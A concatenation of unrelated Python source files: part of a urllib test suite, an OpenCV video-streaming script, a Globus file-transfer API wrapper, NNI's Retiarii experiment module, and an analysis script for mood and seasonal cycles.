(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.quote("make sure")
result = urllib.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_splitpasswd(self):
"""Some of the password examples are not sensible, but it is added to
confirming to RFC2617 and addressing issue4675.
"""
self.assertEqual(('user', 'ab'),urllib.splitpasswd('user:ab'))
self.assertEqual(('user', 'a\nb'),urllib.splitpasswd('user:a\nb'))
self.assertEqual(('user', 'a\tb'),urllib.splitpasswd('user:a\tb'))
self.assertEqual(('user', 'a\rb'),urllib.splitpasswd('user:a\rb'))
self.assertEqual(('user', 'a\fb'),urllib.splitpasswd('user:a\fb'))
self.assertEqual(('user', 'a\vb'),urllib.splitpasswd('user:a\vb'))
self.assertEqual(('user', 'a:b'),urllib.splitpasswd('user:a:b'))
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.URLopener):
def open_spam(self, url):
return url
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# Just commented them out.
# Can't really tell why keep failing in windows and sparc.
# Everywhere else they work ok, but on those machines, someteimes
# fail in one of the tests, sometimes in other. I have a linux, and
# the tests go ok.
# If anybody has one of the problematic enviroments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen(5)
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertTrue(socket.getdefaulttimeout() is None)
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
def test_main():
import warnings
with warnings.catch_warnings():
warnings.filterwarnings('ignore', ".*urllib\.urlopen.*Python 3.0",
DeprecationWarning)
test_support.run_unittest(
urlopen_FileTests,
urlopen_HttpTests,
urlretrieve_FileTests,
ProxyTests,
QuotingTests,
UnquotingTests,
urlencode_Tests,
Pathname_Tests,
Utility_Tests,
URLopener_Tests,
#FTPWrapperTests,
)
if __name__ == '__main__':
test_main()
|
ip_streamer.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 10 15:11:48 2020
@author: Nikki
"""
import cv2
import datetime
import sys
import multiprocessing as mp
import time
from ctypes import c_bool
#ip streams
#multiple video cap objsects
#change detection to output to csv, save every 5 min or so
#make separate processes
#need to check that frame grabbed exists and hasn't already been processed
def main():
ips = ['/home/worklab/Data/cv/video/AOTsample1_1.mp4']
m = mp.Manager()
updated = m.Value(c_bool, False)
frames = m.list([None] * len(ips))
times = m.list([None] * len(ips))
#lock = manager.Lock()
#start_lock = manager.Lock()
streamers = []
try:
for i, ip in enumerate(ips):
streamers.append(mp.Process(target=stream_all, args=(frames, times, ip, updated, i)))
for streamer in streamers:
streamer.start()
while updated.value == False:
continue
while True:
for i in range(len(ips)):
#cv2.namedWindow("result" + str(i), cv2.WINDOW_NORMAL)
cv2.imshow("result" + str(i), frames[i])
if cv2.waitKey(1) & 0xFF == ord('q'): break
except:
print('Unexpected error: ', sys.exc_info())
for streamer in streamers:
streamer.terminate()
cv2.destroyAllWindows()
def stream_all(frames, times, camera, updated, i):
#list of ip addresses to get video from
stream = open_cap(camera["address"] ) # frames = [None] * len(ips)
# times = [None] * len(ips)
print(frames[i])
print(times[i])
print(stream)
get_cap(stream, frames, times, i)
updated.value = True
try:
ret_val = True
while(True):
ret_val = get_cap(stream, frames, times, i)
updated.value = True
# cv2.namedWindow("result" + str(i), cv2.WINDOW_NORMAL)
# cv2.imshow("result" + str(i), frames[i])
# if cv2.waitKey(1) & 0xFF == ord('q'): break
print("Finished all frames.")
close_cap(stream)
cv2.destroyAllWindows()
except:
print("Unexpected error:", sys.exc_info()[0])
close_cap(stream)
cv2.destroyAllWindows()
return
#opens video capture objects for all input streams
def open_cap(ip):
print("Video from: ", ip)
stream = cv2.VideoCapture(ip)
print ("Capture opened")
return stream
#gets the next frame from each video capture object
#at some point should read this directly into shared memory
def get_cap(stream, frames, times, i):
times[i] = datetime.datetime.now()
ret_val, frames[i] = stream.read()
return ret_val
#closes all video capture objects
def close_cap(stream):
stream.release()
print ("Captures closed")
if __name__ == "__main__":
main()
|
api.py
|
"""Interact with the Globus API. All endpoint connections happen here."""
import threading
import time
from globusonline.transfer import api_client
class GlobusAPI(object):
def __init__(self, local_endpoint, remote_endpoint):
"""Create a wrapper around the Globus API Client."""
# Get credentials.
auth_result = api_client.goauth.get_access_token()
self.api = api_client.TransferAPIClient(
username=auth_result.username, goauth=auth_result.token)
# Activate endpoints.
self.local_endpoint, self.remote_endpoint = local_endpoint, remote_endpoint
status, msg, data = self.api.endpoint_autoactivate(local_endpoint)
print data['message']
assert status == 200
status, msg, data = self.api.endpoint_autoactivate(remote_endpoint)
print data['message']
assert status == 200
# Setup asynchronous task queue.
self.task_queue = AsyncTaskQueue(self)
def Close(self):
"""Wait for pending changes and close out the API connection."""
self.task_queue.Finish()
self.api.close()
def SubmissionID(self):
"""Get a new submission id."""
status, msg, data= self.api.transfer_submission_id()
return data['value']
######################
# Blocking Requests #
######################
def CopyToLocal(self, remote_path, local_path, timeout_secs=10):
"""Copy a remote file into the local endpoint.
Args:
remote_path: Remote file path to copy.
local_path: Destination file path.
timeout: Maximum waiting time (in seconds) for file transfer to complete.
Returns:
True if the transfer was successful, False otherwise.
"""
# Copy the file over the network; block until successful or timeout.
print 'Copying {0} to local cache...'.format(remote_path)
task = api_client.Transfer(
self.SubmissionID(), self.remote_endpoint, self.local_endpoint)
task.add_item(remote_path, local_path)
status, msg, data = self.api.transfer(task)
task_id = data['task_id']
success = False
for _ in xrange(timeout_secs):
status, msg, data = self.api.task(task_id)
if data['completion_time']:
success = True
break
time.sleep(1)
return success
def EndpointList(self, path):
"""Return a list of file info dictionaries for the given path."""
print 'Loading directory %s from Globus...' % path
status, msg, data = self.api.endpoint_ls(self.remote_endpoint, path=path)
return data['DATA']
def Mkdir(self, path):
"""Make a directory on the remote endpoint."""
_, _, data = self.api.endpoint_mkdir(self.remote_endpoint, path)
print data['message']
########################
# Background Requests #
########################
def Delete(self, path):
"""Add a task to recursively delete the given path."""
self.task_queue.AddDeletion(self.remote_endpoint, path)
def Rename(self, old_path, new_path):
"""Move/Rename a file on the remote endpoint."""
self.task_queue.AddTransfer(self.remote_endpoint, old_path, self.remote_endpoint, new_path)
self.task_queue.AddDeletion(self.remote_endpoint, old_path)
class AsyncTaskQueue(object):
"""Asynchronous task queue. This allows us to batch related requests together.
For example, recurisvely removing a directory would make dozens of calls to api.Delete().
Rather than sending the requests individually, we batch them together here,
reducing network overhead and improving performance.
"""
def __init__(self, api):
# Store tasks as a list (queue).
# Each entry is a 2-tuple:
# descriptor tuple e.g. ('delete', 'go#ep1')
# Globus api_client task to submit
self.queue = []
self.api = api # GlobusAPI() wrapper (has access to SubmissionID)
self.direct_api = api.api # Underlying api object.
self.lock = threading.Lock()
self.last_change = time.time() # Time of last task submission.
self.closing = False # Flag to indicate when the process should close.
self.handler_thread = threading.Thread(target=self.HandleTasks)
self.handler_thread.start()
def Finish(self):
"""Wait until all pending changes have synced and the thread quits."""
self.closing = True
self.handler_thread.join()
def HandleTasks(self):
"""Async function: wake up every so often and process the pending tasks."""
while True:
# Copy the relevant tasks so the lock can be released.
if self.closing or time.time() - self.last_change > 3:
# We're closing or the last change was more than 3 seconds ago; push changes.
queue_copy = []
with self.lock:
# Copy relevant tasks into a separate queue so we can work on them.
queue_copy.extend(self.queue)
self.queue = []
# print 'Clearing task queue...'
pending_task_id = None
for descriptor, task in queue_copy:
if pending_task_id:
# We need to wait at least 30 secs for the last task to finish before
# submitting the next. The ordering of deletes/moves may be important.
for _ in xrange(30):
status, msg, data = self.direct_api.task(pending_task_id)
if data['completion_time']:
break
time.sleep(1)
if descriptor[0] == 'delete':
_, _, data = self.direct_api.delete(task)
pending_task_id = data['task_id']
print '\t' + data['message']
else: # Transfer
_, _, data = self.direct_api.transfer(task)
pending_task_id = data['task_id']
print '\t' + data['message']
if self.closing:
return
time.sleep(10)
def AddDeletion(self, endpoint, path):
descriptor = ('delete', endpoint)
with self.lock:
if self.queue and self.queue[-1][0] == descriptor:
self.queue[-1][1].add_item(path)
else:
task = api_client.Delete(self.api.SubmissionID(), endpoint, recursive=True)
task.add_item(path)
self.queue.append((descriptor, task))
self.last_change = time.time()
def AddTransfer(self, src_endpoint, src_path, dest_endpoint, dest_path):
descriptor = ('transfer', src_endpoint, dest_endpoint)
with self.lock:
if self.queue and self.queue[-1][0] == descriptor:
self.queue[-1][1].add_item(src_path, dest_path, recursive=True)
else:
task = api_client.Transfer(self.api.SubmissionID(), src_endpoint, dest_endpoint)
task.add_item(src_path, dest_path, recursive=True)
self.queue.append((descriptor, task))
self.last_change = time.time()
|
pytorch.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import atexit
import logging
import os
import socket
import time
from dataclasses import dataclass
from pathlib import Path
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import colorama
import psutil
import torch
import torch.nn as nn
import nni.runtime.log
from nni.common.device import GPUDevice
from nni.experiment import Experiment, TrainingServiceConfig, launcher, management, rest
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from nni.tools.nnictl.command_utils import kill_command
from ..codegen import model_to_pytorch_script
from ..converter import convert_to_graph
from ..converter.graph_gen import GraphConverterWithShape
from ..execution import list_models, set_execution_engine
from ..execution.python import get_mutation_dict
from ..graph import Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import extract_mutation_from_pt_module, process_inline_mutation
from ..oneshot.interface import BaseOneShotTrainer
from ..strategy import BaseStrategy
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = '_reserved'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
devices: Optional[List[Union[str, GPUDevice]]] = None
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
max_concurrency_cgo: Optional[int] = None
batch_waiting_time: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: PathLike = '~/nni-experiments'
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
execution_engine: str = 'py'
# input used in GraphConverterWithShape. Currently support shape tuple only.
dummy_input: Optional[List[int]] = None
# input used for benchmark engine.
benchmark: Optional[str] = None
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
self.training_service = util.training_service_config_factory(platform=training_service_platform)
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry py'
def __setattr__(self, key, value):
fixed_attrs = {'search_space': '',
'trial_command': '_reserved'}
if key in fixed_attrs and fixed_attrs[key] != value:
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
# 'trial_code_directory' is handled differently because the path will be converted to absolute path by us
if key == 'trial_code_directory' and not (value == Path('.') or os.path.isabs(value)):
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
if key == 'execution_engine':
assert value in ['base', 'py', 'cgo', 'benchmark'], f'The specified execution engine "{value}" is not supported.'
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry ' + value
self.__dict__[key] = value
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
def preprocess_model(base_model, trainer, applied_mutators, full_ir=True, dummy_input=None):
# TODO: this logic might need to be refactored into execution engine
if full_ir:
try:
script_module = torch.jit.script(base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
if dummy_input is not None:
# FIXME: this is a workaround as full tensor is not supported in configs
dummy_input = torch.randn(*dummy_input)
converter = GraphConverterWithShape()
base_model_ir = convert_to_graph(script_module, base_model, converter, dummy_input=dummy_input)
else:
base_model_ir = convert_to_graph(script_module, base_model)
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
else:
base_model_ir, mutators = extract_mutation_from_pt_module(base_model)
base_model_ir.evaluator = trainer
if mutators is not None and applied_mutators:
raise RuntimeError('Have not supported mixed usage of LayerChoice/InputChoice and mutators, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
applied_mutators = mutators
return base_model_ir, applied_mutators
def debug_mutated_model(base_model, trainer, applied_mutators):
"""
Locally run only one trial without launching an experiment for debug purpose, then exit.
For example, it can be used to quickly check shape mismatch.
Specifically, it applies mutators (default to choose the first candidate for the choices)
to generate a new model, then run this model locally.
Parameters
----------
base_model : nni.retiarii.nn.pytorch.nn.Module
the base model
trainer : nni.retiarii.evaluator
the training class of the generated models
applied_mutators : list
a list of mutators that will be applied on the base model for generating a new model
"""
base_model_ir, applied_mutators = preprocess_model(base_model, trainer, applied_mutators)
from ..strategy import _LocalDebugStrategy
strategy = _LocalDebugStrategy()
strategy.run(base_model_ir, applied_mutators)
_logger.info('local debug completed!')
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
base_model_ir, self.applied_mutators = preprocess_model(
self.base_model, self.trainer, self.applied_mutators,
full_ir=self.config.execution_engine not in ['py', 'benchmark'],
dummy_input=self.config.dummy_input
)
_logger.info('Start strategy...')
self.strategy.run(base_model_ir, self.applied_mutators)
_logger.info('Strategy exit')
# TODO: find out a proper way to show no more trial message on WebUI
# self._dispatcher.mark_experiment_as_ending()
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
atexit.register(self.stop)
# we will probably need a execution engine factory to make this clean and elegant
if self.config.execution_engine == 'base':
from ..execution.base import BaseExecutionEngine
engine = BaseExecutionEngine()
elif self.config.execution_engine == 'cgo':
from ..execution.cgo_engine import CGOExecutionEngine
# assert self.config.trial_gpu_number==1, "trial_gpu_number must be 1 to use CGOExecutionEngine"
assert self.config.batch_waiting_time is not None
devices = self._construct_devices()
engine = CGOExecutionEngine(devices,
max_concurrency=self.config.max_concurrency_cgo,
batch_waiting_time=self.config.batch_waiting_time)
elif self.config.execution_engine == 'py':
from ..execution.python import PurePythonExecutionEngine
engine = PurePythonExecutionEngine()
elif self.config.execution_engine == 'benchmark':
from ..execution.benchmark import BenchmarkExecutionEngine
engine = BenchmarkExecutionEngine(self.config.benchmark)
set_execution_engine(engine)
self.id = management.generate_experiment_id()
if self.config.experiment_working_directory is not None:
log_dir = Path(self.config.experiment_working_directory, self.id, 'log')
else:
log_dir = Path.home() / f'nni-experiments/{self.id}/log'
nni.runtime.log.start_experiment_log(self.id, log_dir, debug)
self._proc, self._pipe = launcher.start_experiment_retiarii(self.id, self.config, port, debug)
assert self._proc is not None
assert self._pipe is not None
self.port = port # port will be None if start up failed
# dispatcher must be launched after pipe initialized
# the logic to launch dispatcher in background should be refactored into dispatcher api
self._dispatcher = self._create_dispatcher()
self._dispatcher_thread = Thread(target=self._dispatcher.run)
self._dispatcher_thread.start()
ips = [self.config.nni_manager_ip]
for interfaces in psutil.net_if_addrs().values():
for interface in interfaces:
if interface.family == socket.AF_INET:
ips.append(interface.address)
ips = [f'http://{ip}:{port}' for ip in ips if ip]
msg = 'Web UI URLs: ' + colorama.Fore.CYAN + ' '.join(ips) + colorama.Style.RESET_ALL
_logger.info(msg)
exp_status_checker = Thread(target=self._check_exp_status)
exp_status_checker.start()
self._start_strategy()
# TODO: the experiment should be completed, when strategy exits and there is no running job
_logger.info('Waiting for experiment to become DONE (you can ctrl+c if there is no running trial jobs)...')
exp_status_checker.join()
def _construct_devices(self):
devices = []
if hasattr(self.config.training_service, 'machine_list'):
for machine in self.config.training_service.machine_list:
for gpu_idx in machine.gpu_indices:
devices.append(GPUDevice(machine.host, gpu_idx))
else:
for gpu_idx in self.config.training_service.gpu_indices:
devices.append(GPUDevice('local', gpu_idx))
return devices
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function will block until experiment finish or error.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
self.start(port, debug)
def _check_exp_status(self) -> bool:
"""
Run the experiment.
This function will block until experiment finish or error.
Return `True` when experiment done; or return `False` when experiment failed.
"""
try:
while True:
time.sleep(10)
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
status = self.get_status()
else:
return False
if status == 'DONE' or status == 'STOPPED':
return True
if status == 'ERROR':
return False
except KeyboardInterrupt:
_logger.warning('KeyboardInterrupt detected')
finally:
self.stop()
def stop(self) -> None:
"""
Stop background experiment.
"""
_logger.info('Stopping experiment, please wait...')
atexit.unregister(self.stop)
# stop strategy first
if self._dispatcher_thread is not None:
self._dispatcher.stopping = True
self._dispatcher_thread.join(timeout=1)
if self.id is not None:
nni.runtime.log.stop_experiment_log(self.id)
if self._proc is not None:
try:
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
rest.delete(self.port, '/experiment')
except Exception as e:
_logger.exception(e)
_logger.warning('Cannot gracefully stop experiment, killing NNI process...')
kill_command(self._proc.pid)
if self._pipe is not None:
self._pipe.close()
self.id = None
self.port = None
self._proc = None
self._pipe = None
self._dispatcher = None
self._dispatcher_thread = None
_logger.info('Experiment stopped')
def export_top_models(self, top_k: int = 1, optimize_mode: str = 'maximize', formatter: str = 'dict') -> Any:
"""
Export several top performing models.
For one-shot algorithms, only top-1 is supported. For others, ``optimize_mode`` and ``formatter`` are
available for customization.
top_k : int
How many models are intended to be exported.
optimize_mode : str
``maximize`` or ``minimize``. Not supported by one-shot algorithms.
``optimize_mode`` is likely to be removed and defined in strategy in future.
formatter : str
Support ``code`` and ``dict``. Not supported by one-shot algorithms.
If ``code``, the python code of model will be returned.
If ``dict``, the mutation history will be returned.
"""
if formatter == 'code':
assert self.config.execution_engine != 'py', 'You should use `dict` formatter when using Python execution engine.'
if isinstance(self.trainer, BaseOneShotTrainer):
assert top_k == 1, 'Only support top_k is 1 for now.'
return self.trainer.export()
else:
all_models = filter(lambda m: m.metric is not None, list_models())
assert optimize_mode in ['maximize', 'minimize']
all_models = sorted(all_models, key=lambda m: m.metric, reverse=optimize_mode == 'maximize')
assert formatter in ['code', 'dict'], 'Export formatter other than "code" and "dict" is not supported yet.'
if formatter == 'code':
return [model_to_pytorch_script(model) for model in all_models[:top_k]]
elif formatter == 'dict':
return [get_mutation_dict(model) for model in all_models[:top_k]]
def retrain_model(self, model):
"""
this function retrains the exported model, and test it to output test accuracy
"""
raise NotImplementedError
|
compare_to_seasonal_cycles.py
|
from constants_and_util import *
import pandas as pd
from traceback import print_exc
import random
import numpy as np
from scipy.signal import argrelextrema
import statsmodels.api as sm
import warnings
import statsmodels.formula.api as smf
from copy import deepcopy
import json
from IPython import embed
from collections import Counter
from scipy.stats import pearsonr, linregress
import time
import string
import cPickle
import math
import dataprocessor
from scipy.special import expit
from multiprocessing import Process, Manager
from copy import deepcopy
import datetime
import matplotlib.pyplot as plt
from scipy.stats import scoreatpercentile
import sys
#from mpl_toolkits.basemap import Basemap
import matplotlib as mpl
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from matplotlib.patches import PathPatch
import matplotlib.gridspec as gridspec
import gc
def load_all_results(continuous_only=False):
"""
Loads in a dictionary of results.
(results for each mood pair are saved in their own file; this combines them).
checked.
"""
print("Loading in analysis results from %s" % base_results_dir)
results = {}
for filename in os.listdir(base_results_dir):
if continuous_only and 'continuous' not in filename:
continue
if FILTER_FOR_VERY_ACTIVE_LOGGERS_IN_ALL_ANALYSIS and 'VERY_ACTIVE_LOGGERS_' not in filename:
continue
if ('versus' in filename) and (('n_chunks_to_use_%i' % n_chunks_to_use) in filename):
t0 = time.time()
print 'Adding %s to results' % filename
d = cPickle.load(open(os.path.join(base_results_dir, filename), 'rb'))
assert len(d.keys()) == 1
results.update(d)
print("Time to load %s: %2.3f seconds" % (filename, time.time() - t0))
for i in range(len(results)):
print '%i. %s' % (i + 1, results.keys()[i])
return results
def get_amplitude_standard_error_from_regression_data(regression_data, cycle):
"""
compute the standard error in the cycle amplitude given a linear regression of coefficients
by resampling the coefficients, taking coef covariances into account.
"""
raise Exception("Not using at present because it seems potentially sketchy, using bootstraps. If you use this, need to check it.")
regression_data = deepcopy(regression_data)
# computing amplitude the old way. Verified this yields the same results if covariance = 0.
simple_mean_format = convert_regression_format_to_simple_mean_format(regression_data,
'linear_regression')
amplitude = get_cycle_amplitude(simple_mean_format,
cycle,
metric_to_use='max_minus_min',
hourly_period_to_exclude=None)
assert cycle in ['date_relative_to_period', 'month', 'weekday', 'local_hour']
param_names = regression_data['params'].index
if cycle == 'date_relative_to_period':
cycle_idxs = param_names.map(lambda x:('date_relative_to_period' in x) and
(np.abs(float(x.split('[T.')[1].replace(']', ''))) <= 14))
assert cycle_idxs.sum() == 28
else:
cycle_idxs = param_names.map(lambda x:cycle in x)
if cycle == 'local_hour':
assert cycle_idxs.sum() == 23
elif cycle == 'month':
assert cycle_idxs.sum() == 11
elif cycle == 'weekday':
assert cycle_idxs.sum() == 6
cov_matrix = deepcopy(regression_data['covariance_matrix'])
beta_hat = deepcopy(regression_data['params'])
assert (cov_matrix.index == beta_hat.index).all()
cov_matrix = cov_matrix.values
beta_hat = beta_hat.values
n_samples = 10000
sample = np.random.multivariate_normal(beta_hat, cov_matrix, size=[n_samples,])
assert sample.shape[1] == len(cycle_idxs)
sample_for_cycle = sample[:, cycle_idxs]
sample_for_cycle = np.hstack([sample_for_cycle, np.zeros([n_samples,1])])
max_vals = sample_for_cycle.max(axis=1)
min_vals = sample_for_cycle.min(axis=1)
sampled_amplitudes = max_vals - min_vals
assert (sampled_amplitudes > 0).all()
assert min(sampled_amplitudes) < amplitude
assert max(sampled_amplitudes) > amplitude
err_95 = 1.96 * np.std(sampled_amplitudes)
#lower_CI = scoreatpercentile(sampled_amplitudes, 2.5)
#upper_CI = scoreatpercentile(sampled_amplitudes, 97.5)
#print 'Lower CI: %2.3f; upper CI %2.3f' % (lower_CI, upper_CI)
#print amplitude, sampled_amplitudes.mean()
return err_95, err_95 # lower and upper errorbars.
def get_cycle_amplitude(data, cycle, metric_to_use, hourly_period_to_exclude):
"""
given data (eg results[opposite_pair]
[substratification][
substratification_level]
['take_simple_means_by_group_no_individual_mean'])
and a cycle and a metric to use (max_minus_min or average_absolute_difference_from_mean)
computes the cycle amplitude.
"""
data = deepcopy(data)
assert metric_to_use in ['max_minus_min' ,'average_absolute_difference_from_mean']
assert cycle in ['date_relative_to_period', 'local_hour', 'weekday', 'month', 'week_of_year']
if cycle == 'date_relative_to_period':
data[cycle] = data[cycle].loc[data[cycle].index.map(lambda x:np.abs(x) <= 14)]
assert list(data[cycle].index) == list(range(-14, 15))
if cycle == 'local_hour':
if hourly_period_to_exclude is None:
assert list(data[cycle].index) == list(range(24))
else:
assert len(hourly_period_to_exclude) == 2
assert hourly_period_to_exclude[0] < hourly_period_to_exclude[1]
data[cycle] = data[cycle].loc[data[cycle].index.map(lambda x:(x < hourly_period_to_exclude[0]) or (x > hourly_period_to_exclude[1]))]
assert list(data[cycle].index) == [a for a in list(range(24)) if a < hourly_period_to_exclude[0] or a > hourly_period_to_exclude[1]]
if cycle == 'weekday':
assert list(data[cycle].index) == list(['Friday', 'Monday', 'Saturday', 'Sunday', 'Thursday', 'Tuesday',
'Wednesday'])
if cycle == 'month':
assert list(data[cycle].index) == list(range(1, 13))
if cycle == 'week_of_year':
assert list(data[cycle].index) == list(range(52))
y = np.array(data[cycle]['mean'])
y_mu = y.mean()
average_absolute_difference_from_mean = np.mean(np.abs(y - y_mu))
largest_difference = y.max() - y.min()
if metric_to_use == 'max_minus_min':
metric_val = largest_difference
else:
metric_val = average_absolute_difference_from_mean
return metric_val
def make_basemap(country_vals, bin_edges, bin_edge_labels, title_string, filename=None, plot_colorbar=True):
"""
Given a dictionary which maps country names to values
a list of bin edges (numbers) (which must span the min and max values)
a list of bin edge labels (strings)
and a title,
makes a map.
Checked.
"""
fig = plt.figure(figsize=[7, 5])
ax = fig.add_subplot(111)
from matplotlib.colors import LinearSegmentedColormap
colors = ['#023eff', '#ffffff', '#e8000b']#[(1, 0, 0), (1, 1, 1), (0, 0, 1)]
cm_fxn = LinearSegmentedColormap.from_list(
'mycmap', colors, N=256)
#cm_fxn = plt.get_cmap(cmap_coloring)
num_bins = len(bin_edges) - 1
assert len(bin_edges) == len(bin_edge_labels)
color_scheme = [cm_fxn((i + 1) / (1.*num_bins + 1)) for i in range(num_bins)] # normalization is + 1 so that the middle bin is .5.
cmap_for_legend = mpl.colors.ListedColormap(color_scheme) # we use this to make the color scheme in the legend.
m = Basemap(llcrnrlat = -60, urcrnrlat = 85, llcrnrlon = -180, urcrnrlon=180, resolution='l', fix_aspect = True)
m.drawmapboundary(fill_color='white')
m.fillcontinents(color='#dddddd',lake_color='white')
m.readshapefile('country_shapefile/UIA_World_Countries_Boundaries',
'UIA_World_Countries_Boundaries', drawbounds = False)
patches = []
facecolors = []
countries_not_found = list(set(country_vals.keys()))
for info, shape in zip(m.UIA_World_Countries_Boundaries_info, m.UIA_World_Countries_Boundaries):
# loop over the patches which make up countries.
# For each patch, if it's in the list of countries we passed in, color it appropriately.
def map_to_my_country_names(x):
# small helper method to render names consistent.
if x == 'United Kingdom':
return 'Britain (UK)'
elif x == 'South Korea':
return 'Korea (South)'
elif x == 'Russian Federation':
return 'Russia'
elif x == 'Trinidad and Tobago':
return 'Trinidad & Tobago'
elif x == "C\xc3\xb4te d'Ivoire":
return "Cte d'Ivoire"
elif x == 'Bosnia and Herzegovina':
return 'Bosnia & Herzegovina'
elif x == 'Brunei Darussalam':
return 'Brunei'
elif x == 'The Former Yugoslav Republic of Macedonia':
return 'Macedonia'
return x
country_name = map_to_my_country_names(info['Country'])
if country_name in country_vals:
country_val = country_vals[country_name]
if not ((country_val < np.max(bin_edges)) and (country_val > np.min(bin_edges))):
raise Exception("%s, value %2.3f is out of range of bins" % (country_name, country_val))
bin_idx = int(np.digitize(country_val, bin_edges))
# digitize documentation: Each index i returned is such that bins[i-1] <= x < bins[i] if bins is monotonically increasing
bin_idx = bin_idx - 1 # smallest value of bin_idx will be 0; largest will be num_bins - 1.
